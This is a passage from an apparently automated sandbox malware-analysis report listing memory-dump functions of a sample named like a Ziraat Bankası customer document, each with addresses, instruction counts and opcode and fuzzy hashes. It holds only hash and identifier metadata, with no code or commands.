                                        • Opcode Fuzzy Hash: 25c3110879710e61369720a0fd1cb736e4ec00c48d0d2538a64806e1973b325f
                                        • Instruction Fuzzy Hash: 66311A7554D3C08FDB03CB64D994745BF71AF47214F2985EBD8898F2A7C23A980ACB62
                                        Function 0151D044 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4152924438.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_151d000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31de1ab0c4f6c6cdca4d2034d61d2d3299f530c34250e5c43596a381cbf86905
                                        • Instruction ID: f7ff3536178226fa4bb90f77c2fad13965398938f5044390ef03362cf009b4c2
                                        • Opcode Fuzzy Hash: 31de1ab0c4f6c6cdca4d2034d61d2d3299f530c34250e5c43596a381cbf86905
                                        • Instruction Fuzzy Hash: 28212575504204DFEB16DF68C8C8B26BBB5FB84314F20C96DE8494F24AD73AD846CA61

                                        Non-executed Functions

                                        Function 06F30040 Relevance: .6, Instructions: 596COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4402bbfd9fdf2c4b78a451ba1acef2424965cf6f8ddb587c73125bc32c0b42e
                                        • Instruction ID: e6b4579d1df427b68d9b7e8749c37cd9a9c9f7336a40c77d22910d46ffd22060
                                        • Opcode Fuzzy Hash: a4402bbfd9fdf2c4b78a451ba1acef2424965cf6f8ddb587c73125bc32c0b42e
                                        • Instruction Fuzzy Hash: B1527974E01229CFDB65DF69C884B9DBBB2BF89300F1481EAD409AB254DB359E85CF50
                                        Function 06F3E6B8 Relevance: .3, Instructions: 268COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b614842a78613c683a95d270ce72382ffbaf3cbdc7dd650f313e989751e8e3bd
                                        • Instruction ID: 382377d561452462ceee9fa6cf7ce5a224157c33c63baef551fa0c95ad83b97b
                                        • Opcode Fuzzy Hash: b614842a78613c683a95d270ce72382ffbaf3cbdc7dd650f313e989751e8e3bd
                                        • Instruction Fuzzy Hash: F0C1A174E01218CFDB55DFA5C994B9DBBB2BF89300F2081A9D809AB395DB359E81CF50
                                        Function 06F3E260 Relevance: .3, Instructions: 268COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5452efbff930deb1355a48bf4246cdc1b4917ae9a345b703a598920d03e5c2bd
                                        • Instruction ID: 1cf0afce11fdd284c0a4ca956ff1e8a70334269c6829e5b790451394cdd58db0
                                        • Opcode Fuzzy Hash: 5452efbff930deb1355a48bf4246cdc1b4917ae9a345b703a598920d03e5c2bd
                                        • Instruction Fuzzy Hash: FDC19074E00218CFDB55DFA5C994B9DBBB2BF89300F2081A9D809AB395DB359E85CF50
                                        Function 06F3DE08 Relevance: .3, Instructions: 268COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3c236a7784642d0ba1b1cb8957ae8d5bbd333ed07e4786c78de12e8a3e61e8ed
                                        • Instruction ID: 2b5d52a0384aa00658568f426aa5351769cf7eb2e5408b378499a8b5925cb6a2
                                        • Opcode Fuzzy Hash: 3c236a7784642d0ba1b1cb8957ae8d5bbd333ed07e4786c78de12e8a3e61e8ed
                                        • Instruction Fuzzy Hash: 2FC19174E00218CFDB55DFA5C994BADBBB2BF89300F1081A9D809AB395DB359E85CF50
                                        Function 06F3F3C0 Relevance: .3, Instructions: 268COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a9e55706869f7ff52d520f2fb3c11c080515b59274a168b3c7e6535b24f3d042
                                        • Instruction ID: 92d7241c1065c471f1763bbc8079cc0a91107888969e6db6d2b5454e3345d75d
                                        • Opcode Fuzzy Hash: a9e55706869f7ff52d520f2fb3c11c080515b59274a168b3c7e6535b24f3d042
                                        • Instruction Fuzzy Hash: AEC1A074E01218CFDB55DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E81CF50
                                        Function 06F3EF68 Relevance: .3, Instructions: 268COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: abe74e646f70cb95f56642064d56cef8e650fc0d422fbbfc0b7a03e8afdc8b9e
                                        • Instruction ID: 5fdeade0cf6b7211c70532da4bd6493bba7dc753315fc027b25d720954b103c8
                                        • Opcode Fuzzy Hash: abe74e646f70cb95f56642064d56cef8e650fc0d422fbbfc0b7a03e8afdc8b9e
                                        • Instruction Fuzzy Hash: 9CC1A174E01218CFDB55DFA5C984BADBBB2BF89300F2081A9D809AB355DB359E81CF50
                                        Function 06F3EB10 Relevance: .3, Instructions: 268COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 279e54f4d56940a1cf323bb5dd800e4144e37257fe9f2994688639a9cfebc5aa
                                        • Instruction ID: b398a1f2a6c84630e74492b232acc752b0afa15d91ac2c45993eab73cf3c8d86
                                        • Opcode Fuzzy Hash: 279e54f4d56940a1cf323bb5dd800e4144e37257fe9f2994688639a9cfebc5aa
                                        • Instruction Fuzzy Hash: C9C19174E00218CFDB55DFA5C994BADBBB2BF89300F1081A9D809AB395DB359E85CF50
                                        Function 06F31CA8 Relevance: .3, Instructions: 268COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a9a23786b01c729c5b3b0b766ae826e3bbaf93e592a5050f76e1ca91d7f0d21
                                        • Instruction ID: 9fddf07c85fc931ce033999849e278f9acbab963d4a23eced0b21c274024fe1d
                                        • Opcode Fuzzy Hash: 9a9a23786b01c729c5b3b0b766ae826e3bbaf93e592a5050f76e1ca91d7f0d21
                                        • Instruction Fuzzy Hash: 3AC1AF74E00218CFDB55DFA5C954BADBBB2BF89300F2080A9D809AB355DB399E85CF50
                                        Function 06F3F818 Relevance: .3, Instructions: 268COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ff082132d7c0c463687f125c6799c1d85198df69319b91bb82e6534046156c7
                                        • Instruction ID: e8b73ee0c69de48a998caae4dafbdf2f9ba026c50c3bcbe582e79489cee1ce0c
                                        • Opcode Fuzzy Hash: 0ff082132d7c0c463687f125c6799c1d85198df69319b91bb82e6534046156c7
                                        • Instruction Fuzzy Hash: 7DC1A074E01218CFDB55DFA5C994BADBBB2BF89300F2080A9D809AB355DB359E85CF50
                                        Function 06F3D9B0 Relevance: .3, Instructions: 268COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3927eb6fcc411fc43d30771cb22fdc3a3b5535111a6ca99482e8267821a1640a
                                        • Instruction ID: a0da81c5f71ee6778ad68e56dfdf9785f2c908e0642bf19f5c7046166d6e62f6
                                        • Opcode Fuzzy Hash: 3927eb6fcc411fc43d30771cb22fdc3a3b5535111a6ca99482e8267821a1640a
                                        • Instruction Fuzzy Hash: 9EC1A074E00218CFDB55DFA5C994BADBBB2BF89300F2080A9D809AB355DB359E85CF50
                                        Function 06F32568 Relevance: .3, Instructions: 268COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b0dc937ba8176167568b038b28485fe083c870cea03e628328a3829b5ec0e76
                                        • Instruction ID: 229355f443400eac65485777b3b0a059e9636ea7b8639200a173f97710a7002f
                                        • Opcode Fuzzy Hash: 1b0dc937ba8176167568b038b28485fe083c870cea03e628328a3829b5ec0e76
                                        • Instruction Fuzzy Hash: ECC19F74E01218CFDB55DFA5D954BADBBB2BF89300F2080A9D809AB355DB399E81CF50
                                        Function 06F3D558 Relevance: .3, Instructions: 268COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 774e5c5276b2febcd967c15cadc2703d29adb6ec1537e55082dfda2e68cb4bc3
                                        • Instruction ID: 012fc6216ef835fa606c6681aaae2f5b4849f15d931d17e226f270b548fefb3e
                                        • Opcode Fuzzy Hash: 774e5c5276b2febcd967c15cadc2703d29adb6ec1537e55082dfda2e68cb4bc3
                                        • Instruction Fuzzy Hash: 6EC1A074E01218CFDB55DFA5C994B9DBBB2BF89300F2080A9D809AB395DB359E85CF50
                                        Function 06F3D100 Relevance: .3, Instructions: 268COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c686a97c67e6f7314560807d5e4046ebacde558e12e87c9a255223ac65814bba
                                        • Instruction ID: acaa254bbaed294ee4b1c7b533dff8b243e6900b02ae5fb3100d37c83f74f757
                                        • Opcode Fuzzy Hash: c686a97c67e6f7314560807d5e4046ebacde558e12e87c9a255223ac65814bba
                                        • Instruction Fuzzy Hash: AAC19074E00218CFDB55DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                        Function 06F32108 Relevance: .3, Instructions: 268COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2f16734acad3e2aa1eaa61706cf49c2bb4739fab5af63f3c40866273d8e43b9c
                                        • Instruction ID: a2133d3a376da65d11c5c8bb9b00e56985bb20c95e6b50a5d176ab30e73cf8f7
                                        • Opcode Fuzzy Hash: 2f16734acad3e2aa1eaa61706cf49c2bb4739fab5af63f3c40866273d8e43b9c
                                        • Instruction Fuzzy Hash: FAC19F74E00218CFDB55DFA5D994BADBBB2BF89300F2081A9D809A7355DB399E81CF50
                                        Function 06F30673 Relevance: .2, Instructions: 193COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f8fe54b5bda958e6d8c6b2af9ef1727f440459f88e27b48f65d5f9a6fd890aa7
                                        • Instruction ID: 079e229c97d62ff89866526c1adc02f98cf0d598b68d0a3e953d66a7cef4baf4
                                        • Opcode Fuzzy Hash: f8fe54b5bda958e6d8c6b2af9ef1727f440459f88e27b48f65d5f9a6fd890aa7
                                        • Instruction Fuzzy Hash: DEA19C74A01228CFDB65DF64C954B9ABBB2BF89300F5085EAD40DA7350DB359E81CF51
                                        Function 06F30854 Relevance: .1, Instructions: 116COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d38345e5e11438eb4ba5441f94adfeb0dcc38efa311b8abed2069ce255fd4534
                                        • Instruction ID: 60c2ff0a5c26d2e693ea8f5d7e424a311da8ef0a1d1af1bce383c75cc2efffbe
                                        • Opcode Fuzzy Hash: d38345e5e11438eb4ba5441f94adfeb0dcc38efa311b8abed2069ce255fd4534
                                        • Instruction Fuzzy Hash: 3A51A474A01228CFDB69DF24D954B99BBB2FF4A301F5085E9D40AA7350CB359E81CF50